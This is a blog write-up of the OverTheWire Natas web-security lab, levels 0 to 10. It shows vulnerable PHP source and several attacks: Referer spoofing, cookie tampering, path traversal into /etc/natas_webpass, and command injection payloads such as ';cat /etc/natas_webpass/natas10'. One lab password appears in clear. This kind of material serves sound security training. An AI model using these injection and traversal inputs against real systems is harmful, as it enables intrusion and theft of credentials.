Overthewire.org - Natas 1-10

Write-Up

Posted on December 25, 2016 as Overthewire. 7 minutes read.

Introduction

Welcome back to another OverTheWire wargame called "Natas" - which is made only of tasks connected to web security. As the number of exercises is very big (33 at the time of publishing this post), I will break it down in a few smaller parts. Without wasting your time, let's get started!

0

Firstly, we are greeted with this message:

You can find the password for the next level on this page.

As you may suspect, password is hidden somewhere in the source code of the website. Let's take a look:

<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is *********************** -->
</div>

There it is, commented out. Now let's jump into the next level.

1

This time we have more 'serious' protection going on.

You can find the password for the next level on this page, but rightclicking has been blocked!

One of the ways to bypass this protection, is to enter view-source: before the URL of the website.

<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is *********************** -->
</div>

2

This time, we have to look somewhere outside of the source code.

There is nothing on this page

The first thing that comes to my mind is robots.txt - they sometimes contain very useful information. Unfortunately, it did not work out this time. But there was something that concerned me.

<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>

What is this pixel.png? It's in the directory called files, maybe we'll find something more useful there.

Great, apart from pixel.png we have users.txt containing pass for the next one!

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:***********************
eve:zo4mJWyNj2
mallory:9urtcpzBmH

3

Once again:

There is nothing on this page

But!

This time we have a clue in robots.txt. I knew it will help at some point!

User-agent: *
Disallow: /s3cr3t/

Going under this directory lets us view another users.txt with password to the next one.

natas4:***********************

4

Oh, something new!

Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

It must be something with HTTP referer, changing it's property (spoofing) may allow me to enter.

After quick googling, I came up with this plugin for Chrome - Referer Control. After changing the referer to this, provided in instructions, and refreshing the page I got the pass to the next one.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

5

But, how can I log in? :D

Access disallowed. You are not logged in

Actually, this level was very easy - using EditThisCookie I was able to change the value of loggedin cookie from 0 to 1, resulting in ability to view the password.

Access granted. The password for natas6 is ***********************

6

This time we've got simple form, with ability to view it's source code.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Actually, we don't have to analyze whole code, what's essential is the include part and since $secret is assigned nowhere in this code I can assume, that it's in the secret.inc file. Let's check it!

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Now last thing is to enter the secret into the input form.

Great, it works!

Access granted. The password for natas7 is ***********************

7

In this level we have simple structure of the website - clicking the elements in the menu changes the content of the website.

<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
this is the about page

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>

Ok, we have this hint. Let's try to break this system and get access to /etc/natas_webpass/natas8

Actualy I didn't have to break it, simple entering this in URL like index.php?page=/etc/natas_webpass/natas8 allowed me to view the file.

***********************

8

Another level, another form.

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

Let's break down this process - firstly script takes input entered in form, then with function encodeSecret it converts binary to hex, reverses this string and encodes with base64. What we have to do here is to reverse this process, which can be done with php.

[email protected] ~ $ php -r 'echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));'

This one liner produces the correct secret, which after entering into the form gives pass to the nex level.

Access granted. The password for natas9 is ***********************

9

This time we have something new - form searching in an dictionary. Let's check the source code.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

Actually, what this script does is very dangerous. We know that grep is command line function searching through the text files. But what, if we have entered semicolon and then another command? Acutally, you can see it working by entering ;ls- la in search form.

-rw-r----- 1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

Great, lets view the password by entering ;cat /etc/natas_webpass/natas10/, as it's also location of all passwords, which was stated in the beginning.

Output:
***********************

African
Africans
Allah
Allah's

Let's move to the next one!

10

This time we have the updated version of the script from the last one, filtering for certain characters.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

We have to find the way to execute this commands in a different way. And actually, after learning a lot about PHP I remembered that . concatenates 2 strings. So let's do this: . /etc/natas_webpass/natas11

Which actually produces the output! I tried to do this also with HTML entities firstly, but unfortunately it did not work out.

/etc/natas_webpass/natas11:***********************
dictionary.txt:African
dictionary.txt:Africans
dictionary.txt:Allah
dictionary.txt:Allah's

And that's the point where I had to end this part of Natas exercises. I'll come back soon with another part, as they are really interesting and completely different from others at OverTheWire.

See you in the next one!

Keep learning and stay safe!

~ W3ndige